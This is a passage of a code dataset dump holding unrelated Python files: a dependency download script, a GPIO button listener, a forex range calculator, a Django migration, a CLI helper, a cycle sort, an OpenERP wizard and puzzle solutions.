os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n\n # Download and extract Stanford CoreNLP.\n stanford_dir = Path(ROOT_DIR) / 'lib' / 'stanford'\n if input_params['download_corenlp']:\n stanford_corenlp_latest_url = 
'https://nlp.stanford.edu/software/stanford-corenlp-latest.zip'\n extracted_files = download_and_extract(url=stanford_corenlp_latest_url, local_dir=str(stanford_dir))\n\n stanford_corenlp_jar_name = extracted_files[0].split('/')[0] + '.jar'\n stanford_corenlp_models_jar_name = extracted_files[0].split('/')[0] + '-models.jar'\n stanford_corenlp_jar_path = Path(stanford_dir) / extracted_files[0] / stanford_corenlp_jar_name\n stanford_corenlp_models_jar_path = Path(stanford_dir) / extracted_files[0] / stanford_corenlp_models_jar_name\n\n # Copy corenlp JAR file to lib directory (ensure the destination exists first).\n if not os.path.exists(stanford_dir):\n os.makedirs(stanford_dir)\n shutil.copy(stanford_corenlp_jar_path, stanford_dir)\n\n # Copy corenlp-models JAR file to lib directory.\n shutil.copy(stanford_corenlp_models_jar_path, stanford_dir)\n\n # Remove extracted Stanford CoreNLP directory.\n shutil.rmtree(Path(stanford_dir) / extracted_files[0].split('/')[0])\n\n log.info(\n f\"Downloaded and extracted files: ['{stanford_corenlp_jar_path}', '{stanford_corenlp_models_jar_path}'].\")\n\n # Download Stanford Shift-Reduce Constituency Parser.\n if input_params['download_srparser']:\n stanford_srparser_url = 'https://nlp.stanford.edu/software/stanford-srparser-2014-10-23-models.jar'\n if not os.path.exists(stanford_dir):\n os.makedirs(stanford_dir)\n download(url=stanford_srparser_url, local_dir=str(stanford_dir))\n log.info(\n f\"Downloaded Stanford Shift-Reduce Constituency Parser library to '{stanford_dir}'.\")\n\n # MongoDB Java Driver.\n if input_params['download_mongodb']:\n mongodb_url = 'https://repo1.maven.org/maven2/org/mongodb/mongo-java-driver/3.12.7/mongo-java-driver-3.12.7.jar'\n mongodb_dir = Path(ROOT_DIR) / 'lib' / 'mongodb'\n if not os.path.exists(mongodb_dir):\n os.makedirs(mongodb_dir)\n download(url=mongodb_url, local_dir=str(mongodb_dir))\n log.info(\n f\"Downloaded MongoDB Java Driver to '{mongodb_dir}'.\")\n\n # Word embeddings.\n for model_name in ['glove', 'word2vec', 'fasttext']:\n if input_params[f\"download_{model_name}\"]:\n local_dir = Path(ROOT_DIR) / os.environ['DATA_PATH'] / 'word_embeddings' / model_name\n if not os.path.exists(local_dir):\n os.makedirs(local_dir)\n vectors = download_gensim_vectors(model_name=model_name, local_dir=str(local_dir))\n","sub_path":"scripts/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":6611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
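Because every download defaults to on and each has a --no_* switch, a typical invocation that fetches only the Stanford and MongoDB artifacts might look like:

python scripts/download.py --no_download_glove --no_download_word2vec --no_download_fasttext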
+{"seq_id":"115926209","text":"#!/usr/bin/python\n# shutdown/reboot(/power on) Raspberry Pi with pushbutton\n\nimport RPi.GPIO as GPIO\n\nfrom datetime import datetime\nimport time\n\ndef set(value, default):\n return value if value else default\n\nclass GpioPinListener(): \n def __init__(self, pin, onButtonDown=None, onButtonUp=None, onLongPress=None, onShortPress=None, onFallingEdge=None, onRisingEdge=123,shutdown=2, debounce=0.01, pull_up_down=GPIO.PUD_UP, use_internal_pull=False):\n self.pin = pin\n noneLambda = lambda : None\n self.onButtonDown = set(onButtonDown, noneLambda)\n self.onButtonUp = set(onButtonUp, noneLambda)\n self.onLongPress = set(onLongPress, noneLambda)\n self.onShortPress = set(onShortPress, noneLambda)\n self.onFallingEdge = set(onFallingEdge, noneLambda)\n self.onRisingEdge = set(onRisingEdge, noneLambda)\n self.shutdown = shutdown\n self.debounce = debounce\n self.pull_up_down = pull_up_down\n self.buttonPressedTime = None\n self.elapsed = 0\n if use_internal_pull:\n GPIO.setup(pin, GPIO.IN, pull_up_down=pull_up_down)\n else:\n GPIO.setup(pin, GPIO.IN)\n \n GPIO.add_event_detect(pin, GPIO.BOTH, callback=self._buttonStateChanged) \n return\n \n \n def update(self):\n if self.buttonPressedTime is not None:\n self.elapsed = (datetime.now() - self.buttonPressedTime).total_seconds()\n if self.elapsed >= self.shutdown:\n self.elapsed = 0\n self.buttonPressedTime = None\n self.onLongPress()\n \n def _buttonStateChanged(self, pin):\n \n if not (GPIO.input(pin)):\n self._onFallingEdgeWrapper()\n else:\n self._onRisingEdgeWrapper()\n\n def _onFallingEdgeWrapper(self):\n if self.pull_up_down == GPIO.PUD_UP:\n self._onButtonDownWrapper()\n else:\n self._onButtonUpWrapper()\n \n def _onRisingEdgeWrapper(self):\n if self.pull_up_down == GPIO.PUD_UP:\n self._onButtonUpWrapper()\n else:\n self._onButtonDownWrapper()\n \n def _onButtonDownWrapper(self):\n self.onButtonDown()\n if self.buttonPressedTime is None:\n self.buttonPressedTime = datetime.now()\n \n def _onButtonUpWrapper(self):\n self.onButtonUp()\n if self.buttonPressedTime is not None:\n self.buttonPressedTime = None\n if self.elapsed >= self.shutdown:\n a = 10;\n elif self.elapsed >= self.debounce:\n # button pressed for a shorter time, reboot\n self.buttonPressedTime = None\n self.onShortPress() \n \n","sub_path":"gpioPinListener.py","file_name":"gpioPinListener.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"214012605","text":"##########################################################\n# H E A D E R \n##########################################################\n# Name : Ranges\n# Purpose: Produce dataframe of ranges over periods, i.e.\n# average range of all available months for all\n# available years \n# Author : Steve Armstrong\n \n##########################################################\n# I M P O R T S\n##########################################################\n\nimport sys\nimport calendar as cal\nimport datetime as dt\nimport numpy as np\nimport pandas as pd\nfrom itertools import product\nimport decimal\n\n##########################################################\n# M A I N \n########################################################## \n\ndef ranges(df): \n # Calculate number of decimal places\n times_by = len(str(df[''][0]).split('.')[-1])\n # JPY symbols sometimes have only 1, make it 2 in-line with rest\n if times_by == 1: times_by += 1\n # Get 10 to the power of number of decimals to get proportiante \n # number to times by to get real number (i.e. integer)\n times_by = 10**times_by\n \n # Get number of available years\n first_year = df.head(1).index.year[0]\n last_year = df.tail(1).index.year[0]\n \n # Make 2d array of 0's to populate dataframe\n # Use last year+1 as range does not use the upper end\n z = np.zeros(shape=[len(range(first_year, last_year+1)), 12])\n # Use range 1,13 for months as range does not use upper end, same for years\n out_df = pd.DataFrame(z, columns=range(1, 13), index=range(first_year, last_year+1))\n \n # For each year in dataframe\n for year in out_df.index.values:\n \n # For each month in dataframe\n for month in out_df.columns.values:\n total_range = 0\n count = 0\n \n # Get max day of given month for given year\n max_day = cal.monthrange(year, month)[1]\n # Make a temporary dataframe of current month for iteration\n tmp_df = df.ix[dt.date(year, month, 1):dt.date(year, month, max_day)]\n if len(tmp_df) == 0: break\n \n # Calculate range for each given day\n for i in range(0, len(tmp_df)):\n total_range += tmp_df[''][i] - tmp_df[''][i]\n count += 1\n \n # Work out average based on total / num of days \n out_df[month][year] = round((total_range / count) * times_by, 0)\n \n return out_df\n \n","sub_path":"func/ranges.py","file_name":"ranges.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"100164155","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Badge',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ('title', models.CharField(max_length=30)),\n ('description', models.CharField(max_length=80)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='UserBadge',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ('earn_date', models.DateField(auto_now_add=True)),\n ('badge', models.ForeignKey(to='badges.Badge')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='userbadge',\n unique_together=set([('user', 'badge')]),\n ),\n ]\n","sub_path":"badges/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"517763001","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport typer\nimport sys\nimport time\nfrom typing import Dict, List, Literal, Union\nfrom pathlib import Path\n\n\n# Detect if called from pypi installed package or via cloned github repo (development)\ntry:\n from centralcli import config, log, utils, Cache, Response\nexcept (ImportError, ModuleNotFoundError) as e:\n pkg_dir = Path(__file__).absolute().parent\n if pkg_dir.name == \"centralcli\":\n sys.path.insert(0, str(pkg_dir.parent))\n from centralcli import config, log, utils, Cache, Response\n else:\n print(pkg_dir.parts)\n raise e\n\nfrom centralcli.central import CentralApi\n\n\ntty = utils.tty\nCASE_SENSITIVE_TOKENS = [\"R\", \"U\"]\nFormatType = Literal[\"json\", \"yaml\", \"csv\", \"rich\", \"simple\"]\nMsgType = Literal[\"initial\", \"previous\", \"forgot\", \"will_forget\", \"previous_will_forget\"]\n\n\nclass CLICommon:\n def __init__(self, account: str = \"default\", cache: Cache = None, central: CentralApi = None):\n self.account = account\n self.cache = cache\n self.central = central\n\n class AcctMsg:\n def __init__(self, account: str = None, msg: MsgType = None) -> None:\n self.account = account\n self.msg = msg\n\n def __repr__(self) -> str:\n return str(self)\n\n def __str__(self) -> str:\n if self.msg and hasattr(self, self.msg):\n return getattr(self, self.msg)\n else:\n return self.initial\n\n @property\n def initial(self):\n acct_clr = f\"{typer.style(self.account, fg='cyan')}\"\n return (\n f\"{typer.style(f'Using Account: {acct_clr}.', fg='magenta')} \"\n f\"{typer.style(f'Account setting is sticky. ', fg='red', blink=True)}\"\n f\"\\n {acct_clr} {typer.style(f'will be used for subsequent commands until', fg='magenta')}\"\n f\"\\n {typer.style('--account or `-d` (revert to default). is used.', fg='magenta')}\"\n )\n\n @property\n def previous(self):\n return (\n f\"{typer.style(f'Using previously specified account: ', fg='magenta')}\"\n f\"{typer.style(self.account, fg='cyan', blink=True)}. \"\n f\"\\n{typer.style('Use `--account ` to switch to another account.', fg='magenta')}\"\n f\"\\n{typer.style(' or `-d` flag to revert to default account.', fg='magenta')}\"\n )\n\n @property\n def forgot(self):\n return typer.style(\n \"Forget option set for account, and expiration has passed. 
reverting to default account\", fg=\"magenta\"\n )\n\n @property\n def will_forget(self):\n return typer.style(\n f\"Forget options is configured, will revert to default account \"\n f'{typer.style(f\"{config.forget_account_after} mins\", fg=\"cyan\")}'\n f'{typer.style(\" after last command.\", fg=\"magenta\")}',\n fg=\"magenta\",\n )\n\n @property\n def previous_will_forget(self):\n return f\"{self.previous}\\n\\n{self.will_forget}\"\n\n def account_name_callback(self, ctx: typer.Context, account: str):\n if ctx.resilient_parsing: # tab completion, return without validating\n return account\n\n # -- // sticky last account messaging account is loaded in __init__ \\\\ --\n if account in [\"central_info\", \"default\"]:\n if config.sticky_account_file.is_file():\n last_account, last_cmd_ts = config.sticky_account_file.read_text().split(\"\\n\")\n last_cmd_ts = float(last_cmd_ts)\n\n # last account messaging\n if config.forget:\n if time.time() > last_cmd_ts + (config.forget * 60):\n # config.sticky_account_file.unlink(missing_ok=True)\n typer.echo(self.AcctMsg(msg=\"forgot\"))\n else:\n account = last_account\n typer.echo(self.AcctMsg(account, msg=\"previous_will_forget\"))\n else:\n account = last_account\n typer.echo(self.AcctMsg(account, msg=\"previous\"))\n else:\n if account in config.data:\n # config.sticky_account_file.parent.mkdir(exist_ok=True)\n # config.sticky_account_file.write_text(f\"{account}\\n{round(time.time(), 2)}\")\n typer.echo(self.AcctMsg(account))\n\n if config.valid:\n # config.account = self.account = account\n # self.central = CentralApi(account)\n # self.cache = Cache(self.central)\n return account\n else:\n typer.echo(\n f\"{typer.style('ERROR:', fg=typer.colors.RED)} \"\n f\"The specified account: '{config.account}' is not defined in the config @\\n\"\n f\"{config.file}\\n\\n\"\n )\n\n if config.defined_accounts:\n typer.echo(\n f\"The following accounts are defined {', '.join(config.defined_accounts)}\\n\"\n f\"The default account 'central_info' is used if no account is specified via --account flag.\\n\"\n f\"or the ARUBACLI_ACCOUNT environment variable.\\n\"\n )\n else:\n if not config.data:\n # TODO prompt user for details\n typer.secho(\"Configuration doesn't exist\", fg=\"red\")\n else:\n typer.secho(\"No accounts defined in config\", fg=\"red\")\n\n if account not in [\"central_info\", \"default\"]:\n if \"central_info\" not in config.data and \"default\" not in config.data:\n typer.echo(\n f\"{typer.style('WARNING:', fg='yellow')} \"\n f\"'central_info' is not defined in the config. 
This is the default when not overriden by\\n\"\n f\"--account parameter or ARUBACLI_ACCOUNT environment variable.\"\n )\n\n raise typer.Exit(code=1)\n\n @staticmethod\n def default_callback(ctx: typer.Context, default: bool):\n if ctx.resilient_parsing: # tab completion, return without validating\n return\n\n if default and config.sticky_account_file.is_file():\n typer.secho(\"Using default central account\", fg=\"bright_green\")\n config.sticky_account_file.unlink()\n return default\n\n @staticmethod\n def debug_callback(ctx: typer.Context, debug: bool):\n if ctx.resilient_parsing: # tab completion, return without validating\n return False\n\n if debug:\n log.DEBUG = config.debug = debug\n return debug\n\n # not used at the moment but could be used to allow unambiguous partial tokens\n @staticmethod\n def normalize_tokens(token: str) -> str:\n return token.lower() if token not in CASE_SENSITIVE_TOKENS else token\n\n def dev_completion(\n self,\n ctx: typer.Context,\n args: List[str],\n incomplete: str,\n ) -> str:\n # devs = cli.cache.devices\n # _completion = [dev[\"name\"] for dev in devs if incomplete.lower() in dev[\"name\"].lower()]\n # _completion += [dev[\"serial\"] for dev in devs if incomplete.lower() in dev[\"serial\"].lower()]\n # _completion += [dev[\"mac\"] for dev in devs if utils.Mac(incomplete).cols.lower() in dev[\"mac\"].lower()]\n # print(args)\n # [\"site\", \"group\"]\n # return [k for k in [*_completion, \"site\", \"group\"] if incomplete in k]\n return self.cache.completion(incomplete, cache=\"dev\")\n\n @staticmethod\n def get_format(\n do_json: bool = False, do_yaml: bool = False, do_csv: bool = False, do_table: bool = False, default: str = \"rich\"\n ) -> FormatType:\n \"\"\"Simple helper method to return the selected output format type (str)\"\"\"\n if do_json:\n return \"json\"\n elif do_yaml:\n return \"yaml\"\n elif do_csv:\n return \"csv\"\n elif do_table:\n return \"rich\" if default != \"rich\" else \"tabulate\"\n else:\n return default\n\n @staticmethod\n def _display_results(\n data: Union[List[dict], List[str], None] = None,\n tablefmt: str = \"rich\",\n title: str = None,\n caption: str = None,\n pager: bool = True,\n outfile: Path = None,\n sort_by: str = None,\n reverse: bool = False,\n pad: int = None,\n cleaner: callable = None,\n **cleaner_kwargs,\n ):\n if data:\n data = utils.listify(data)\n\n if cleaner:\n data = cleaner(data, **cleaner_kwargs)\n\n if sort_by and all(isinstance(d, dict) for d in data):\n if not all([True if sort_by in d else False for d in data]):\n typer.echo(f\"Invalid dataset for {sort_by} not all entries contain a {sort_by} key\")\n typer.secho(\"sort by is not implemented for all commands yet\", fg=\"red\")\n else:\n data = sorted(data, key=lambda d: d[sort_by])\n\n if reverse:\n data = data[::-1]\n\n outdata = utils.output(\n data,\n tablefmt,\n title=title,\n caption=caption,\n account=None if config.account in [\"central_info\", \"account\"] else config.account,\n config=config,\n )\n typer.echo_via_pager(outdata) if pager and tty and len(outdata) > tty.rows else typer.echo(outdata)\n\n # -- // Output to file \\\\ --\n if outfile and outdata:\n if Path().cwd() != Path.joinpath(config.outdir / outfile):\n if Path.joinpath(outfile.parent.resolve() / \".git\").is_dir():\n typer.secho(\n \"It looks like you are in the root of a git repo dir.\\n\"\n \"Exporting to out subdir.\"\n )\n config.outdir.mkdir(exist_ok=True)\n outfile = config.outdir / outfile\n\n print(typer.style(f\"\\nWriting output to {outfile}... 
\", fg=\"cyan\"), end=\"\")\n outfile.write_text(outdata.file) # typer.unstyle(outdata) also works\n typer.secho(\"Done\", fg=\"green\")\n\n def display_results(\n self,\n resp: Union[Response, List[Response]] = None,\n data: Union[List[dict], List[str], None] = None,\n tablefmt: str = \"rich\",\n title: str = None,\n caption: str = None,\n pager: bool = True,\n outfile: Path = None,\n sort_by: str = None,\n reverse: bool = None,\n pad: int = None,\n exit_on_fail: bool = False,\n ok_status: Union[int, List[int], Dict[int, str]] = None,\n cleaner: callable = None,\n **cleaner_kwargs,\n ) -> None:\n \"\"\"Output Formatted API Response to display and optionally to file\n\n one of resp or data attribute is required\n\n Args:\n resp (Union[Response, List[Response], None], optional): API Response objects.\n data (Union[List[dict], List[str], None], optional): API Response output data.\n tablefmt (str, optional): Format of output. Defaults to \"rich\" (tabular).\n title: (str, optional): Title of output table.\n Only applies to \"rich\" tablefmt. Defaults to None.\n caption: (str, optional): Caption displayed at bottome of table.\n Only applies to \"rich\" tablefmt. Defaults to None.\n pager (bool, optional): Page Output / or not. Defaults to True.\n outfile (Path, optional): path/file of output file. Defaults to None.\n sort_by (Union[str, List[str], None] optional): column or columns to sort output on.\n reverse (bool, optional): reverse the output.\n ok_status (Union[int, List[int], Tuple[int, str], List[Tuple[int, str]]], optional): By default\n responses with status_code 2xx are considered OK and are rendered as green by\n Output class. provide int or list of int to override additional status_codes that\n should also be rendered as success/green. provide a dict with {int: str, ...}\n where string can be any color supported by Output class or \"neutral\" \"success\" \"fail\"\n where neutral is no formatting, and success / fail will use the default green / red respectively.\n cleaner (callable, optional): The Cleaner function to use.\n \"\"\"\n # TODO remove ok_status, and handle in CentralAPI method (set resp.ok = True)\n if pad:\n log.warning(\"Depricated pad parameter referenced in display_results\")\n\n pager = False if config.no_pager else pager\n\n if resp is not None:\n resp = utils.listify(resp)\n\n # data = []\n for idx, r in enumerate(resp):\n if len(resp) > 1:\n _url = r.url if not hasattr(r.url, \"path\") else r.url.path\n typer.secho(f\"Request {idx + 1} [{r.method}: {_url}] Response:\", fg=\"cyan\")\n if not r or tablefmt == \"action\":\n fg = \"green\" if r else \"red\"\n\n typer.secho(str(r), fg=fg)\n if not r and exit_on_fail:\n raise typer.Exit(1)\n else:\n if r.rl:\n rl_str = f\"[italic dark_olive_green2]{r.rl}\".lstrip()\n caption = f\"{caption} {rl_str}\" if caption else rl_str\n self._display_results(\n r.output,\n tablefmt=tablefmt,\n title=title,\n caption=caption,\n pager=pager,\n outfile=outfile,\n sort_by=sort_by,\n reverse=reverse,\n pad=pad,\n cleaner=cleaner,\n **cleaner_kwargs\n )\n\n elif data:\n self._display_results(\n data,\n tablefmt=tablefmt,\n title=title,\n caption=caption,\n pager=pager,\n outfile=outfile,\n sort_by=sort_by,\n reverse=reverse,\n pad=pad,\n cleaner=cleaner,\n **cleaner_kwargs\n )\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"centralcli/clicommon.py","file_name":"clicommon.py","file_ext":"py","file_size_in_byte":14653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"639582704","text":"def sort(array, key=lambda x: x, reverse=False):\n '''Cycle sort is an in-place, unstable sorting algorithm, a comparison sort\n that is theoretically optimal in terms of the total number of writes to the\n original array, unlike any other in-place sorting algorithm.\n\n Running time: O(n^2).\n '''\n if len(array) <= 1:\n return array\n\n # see: http://en.wikipedia.org/wiki/Cycle_sort\n for start in range(len(array) - 1):\n item = array[start]\n pos = start\n\n # find out where to put the item,\n # i.e, how many elements are smaller than it\n pos += sum([key(x) < key(item) for x in array[start + 1:]])\n\n # we're at the good place\n if pos == start:\n continue\n\n # put the item after any duplicates\n while key(item) == key(array[pos]):\n pos += 1\n array[pos], item = item, array[pos]\n\n # rotate the rest of the cycle\n while pos != start:\n pos = start + sum([key(x) < key(item) for x in array[start + 1:]])\n\n while key(item) == key(array[pos]):\n pos += 1\n array[pos], item = item, array[pos]\n\n return array[::-1] if reverse else array\n","sub_path":"order/cyclesort.py","file_name":"cyclesort.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
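
The record above documents the cycle sort algorithm but not its call pattern. A short usage sketch (the import path is illustrative, based on the record's `sub_path`); note that `sort` mutates the list in place and also returns it:

```python
from order.cyclesort import sort  # illustrative import path

print(sort([5, 2, 9, 2, 1]))                # [1, 2, 2, 5, 9]
print(sort([5, 2, 9, 2, 1], reverse=True))  # [9, 5, 2, 2, 1]

# key= sorts arbitrary records, mirroring the built-in sorted():
pairs = [('b', 2), ('a', 3), ('c', 1)]
print(sort(pairs, key=lambda p: p[1]))      # [('c', 1), ('b', 2), ('a', 3)]
```
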
+{"seq_id":"423431451","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2010 Tiny SPRL ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\n\n\nclass duplicate_sale_order_line_wizard(osv.osv_memory):\n \"\"\" duplicate_sale_order_line_wizard \"\"\"\n\n _name = \"duplicate.sale.order.line.wizard\"\n _description = \"duplicate Sale Order\"\n\n _columns = {\n 'extend_so_id': fields.many2one('sale.order', 'Sale Order', required=True, domain=[('state','=','draft')]),\n 'extends_id': fields.many2one('sale.extends','Project Detail',required=True,)\n }\n _defaults = {\n \n }\n\n def make_duplicate_so(self, cr, uid, ids, context=None):\n line_obj = self.pool.get('sale.order.line')\n sale_obj = self.pool.get('sale.order')\n extend_obj = self.pool.get('sale.extends')\n line_ids = context.get('active_ids', False)\n data = self.browse(cr, uid, ids[0], context=context)\n# order = sale_obj.browse(cr, uid, [data.extend_so_id.id], context=context)[0]\n# if line_ids:\n# for line in line_ids:\n# default_val = {}\n# copy_id = line_obj.copy(cr, uid, line, default_val)\n# line_obj.write(cr, uid, [copy_id], {'order_id':order.id}, context)\n# return True\n extend_obj_browse = extend_obj.browse(cr, uid, [data.extends_id.id], context=context)[0]\n code = extend_obj_browse.code\n task_desc = extend_obj_browse.task_desc\n analytic_account = extend_obj_browse.analytic_account_id.id\n project_qty = extend_obj_browse.prod_qty\n order = sale_obj.browse(cr, uid, [data.extend_so_id.id], context=context)[0]\n if line_ids:\n for line in line_ids:\n default_val = {'project_code':code} # 'default_constraint':False\n copy_id = line_obj.copy(cr, uid, line, default_val)\n #line_obj.write(cr, uid, [copy_id], {'extend_ids': [(6,0, [data.extends_id.id])],'project_code':code, 'extend_id':data.extends_id.id, 'project_desc':task_desc,'analytic_account_id': analytic_account, 'project_qty': project_qty, 'order_id':order.id}, context)\n cr.execute('UPDATE sale_order_line SET project_code=%s, extend_id=%s, project_desc=%s, analytic_account_id=%s, project_qty=%s, order_id=%s WHERE id=%s',(code, data.extends_id.id, task_desc, analytic_account, project_qty, order.id, copy_id))\n line_obj.write(cr, uid, [copy_id], {'extend_ids': [(6,0, [data.extends_id.id])], 'order_id':order.id}, context)\n sale_obj.write(cr, uid, [order.id], {'calculated': True}, context=context) \n return True\n\n\nduplicate_sale_order_line_wizard()\n\n# 
vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n\n","sub_path":"improve_spreadsheet/wizard/duplicate_sale_order_line_wizard.py","file_name":"duplicate_sale_order_line_wizard.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
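
The `(6, 0, [...])` triple written to `extend_ids` in the wizard above is OpenERP's relational-field command format rather than an arbitrary magic number. For reference, the standard commands accepted by many2many/one2many writes in the OpenERP 7 ORM (which the `osv`/`cr, uid` style above implies):

```python
# (0, 0, values)   create a new linked record from the values dict
# (1, id, values)  update the linked record with the given id
# (2, id)          delete the linked record
# (3, id)          drop the link to id without deleting the record
# (4, id)          add a link to an existing record
# (6, 0, ids)      replace the whole set of links with ids
line_obj.write(cr, uid, [copy_id],
               {'extend_ids': [(6, 0, [data.extends_id.id])]},
               context)
```
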
+{"seq_id":"214266203","text":"n, k = map(int, input().split())\r\n# n - 1 with gcd > 1 because any number gcd with itself is > 1\r\narray = [0] + [i+1 for i in range(n)]\r\n# print(*array[1:])\r\nif n == k:\r\n print(-1)\r\nelse:\r\n for i in range(0, n-k-1):\r\n \t# All consecutive numbers are coprimes, every swap removes a coprime\r\n array[1], array[n-i] = array[n-i],array[1]\r\n # print(*array[1:])\r\n print(*array[1:])\r\n\r\n\r\n\r\n# def farey(limit):\r\n# '''Fast computation of Farey sequence as a generator'''\r\n# # n, d is the start fraction n/d (0,1) initially \r\n# # N, D is the stop fraction N/D (1,1) initially \r\n# pend = []\r\n# n = 0\r\n# d = N = D = 1\r\n# while True:\r\n# mediant_d = d + D\r\n# if mediant_d <= limit:\r\n# mediant_n = n + N\r\n# pend.append((mediant_n, mediant_d, N, D))\r\n# N = mediant_n\r\n# D = mediant_d\r\n# else:\r\n# yield n, d\r\n# if pend:\r\n# n, d, N, D = pend.pop()\r\n# else:\r\n# break","sub_path":"Problems/10/361B.py","file_name":"361B.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
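
A small self-check of the swap construction above, assuming (as the inline comments suggest) that the task asks for a permutation with exactly `k` positions `i` where `gcd(i, p_i) > 1`. The identity permutation has `n - 1` such positions (every position except 1), and each swap with position 1 turns one of them coprime, because consecutive integers are coprime:

```python
from math import gcd

def build(n, k):
    # mirrors the construction in the solution above
    a = [0] + [i + 1 for i in range(n)]  # 1-indexed identity permutation
    if n == k:
        return None                      # impossible: gcd(1, p_1) is always 1
    for i in range(n - k - 1):
        a[1], a[n - i] = a[n - i], a[1]
    return a[1:]

p = build(7, 3)
print(p)  # [5, 2, 3, 4, 6, 7, 1]
assert sum(gcd(i, v) > 1 for i, v in enumerate(p, 1)) == 3
```
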
+{"seq_id":"204116114","text":"import sys\nimport copy\n\nsys.stdin = open(\"input.txt\", \"r\")\n\nboard = [[int(i) for i in sys.stdin.readline().rstrip().split()] for j in range(10)]\n\nList = []\n\npre_lst = {1:[],2:[],3:[],4:[],5:[]}\n\nlst_check = dict()\n\nlast_check = []\n\nfirst =[(0,0)]\nsecond = [(0,0),(0,1),(1,0),(1,1)]\nthird = [(0,0),(0,1),(0,2),(1,0),(1,1),(1,2),(2,0),(2,1),(2,2)]\nfourth = [(0,0),(0,1),(0,2),(0,3),(1,0),(1,1),(1,2),(1,3),(2,0),(2,1),(2,2),(2,3),(3,0),(3,1),(3,2),(3,3)]\nfifth = [(0,0),(0,1),(0,2),(0,3),(0,4),(1,0),(1,1),(1,2),(1,3),(1,4),(2,0),(2,1),(2,2),(2,3),(2,4),\n (3,0),(3,1),(3,2),(3,3),(3,4),(4,0),(4,1),(4,2),(4,3),(4,4)]\n\ndef inRange(a,b):\n if (0<=a<10) and (0<=b<10):\n return True\n return False\n\ndef check(second,cur):\n ans = []\n for i,j in second:\n curPos = (cur[0] + i, cur[1] + j)\n ans.append(curPos)\n if inRange(curPos[0], curPos[1]) == False or (board[curPos[0]][curPos[1]] != 1):\n return (False, [])\n return (True, tuple(ans))\n\nfor i in range(10):\n for j in range(10):\n cur = (i,j)\n a = check(first,cur)\n if a[0]:\n pre_lst[1].append(a[1])\n lst_check[a[1]] = 1\n last_check.append(cur)\n b = check(second, cur)\n if b[0]:\n pre_lst[2].append(b[1])\n lst_check[b[1]] = 2\n c = check(third, cur)\n if c[0]:\n pre_lst[3].append(c[1])\n lst_check[c[1]] = 3\n d = check(fourth, cur)\n if d[0]:\n pre_lst[4].append(d[1])\n lst_check[d[1]] = 4\n e = check(fifth, cur)\n if e[0]:\n pre_lst[5].append(e[1])\n lst_check[e[1]] = 5\n\nfor i in range(5,0,-1):\n x = pre_lst[i]\n for j in x:\n List.append(j)\n\n\nindex = 0\n\nmin_color = 10000\n\nnum = 0\ndef visit_check(cur):\n for i,j in cur:\n if visit[i][j] == 1:\n return False\n return True\n\n\nmax_index = len(List)\n\ndef finish_check(visit__):\n for i,j in last_check:\n if visit__[i][j] != 1:\n return False\n return True\n\n\ndef pick(n, ans_list, index):\n\n if len(ans_list) == n:\n if finish_check(visit):\n final_list.append(copy.deepcopy(ans_list))\n return\n\n if index == len(List):\n return\n\n cur = List[index]\n if visit_check(cur):\n for i, j in cur:\n visit[i][j] = 1\n ans_list.append(cur)\n pick(n,ans_list,index+1)\n ans_list.pop()\n for i, j in cur:\n visit[i][j] = 0\n\n pick(n,ans_list,index+1)\n\nn = 0\nstop = False\nAns = 10000\n\nwhile n < (len(List)+1):\n n += 1\n final_list = []\n ans_list = []\n visit = [[0 for i in range(10)] for j in range(10)]\n pick(n,ans_list,0)\n print(len(final_list))\n\n for ans in final_list:\n visit_2 = [[0 for i in range(10)] for j in range(10)]\n color = {1: 0, 2: 0, 3: 0, 4: 0, 5: 0}\n for cur in ans:\n cur_color_num = lst_check[cur]\n\n if color[cur_color_num] < 5:\n for i, j in cur:\n visit_2[i][j] = 1\n color[cur_color_num] += 1\n else:\n break\n if finish_check(visit_2):\n Ans = n\n stop = True\n break\n if stop:\n break\n\n\n\"\"\"\ndef dfs(index,count):\n global min_color, max_index, num\n\n if finish_check():\n\n if count < min_color:\n min_color = count\n return\n\n if count == 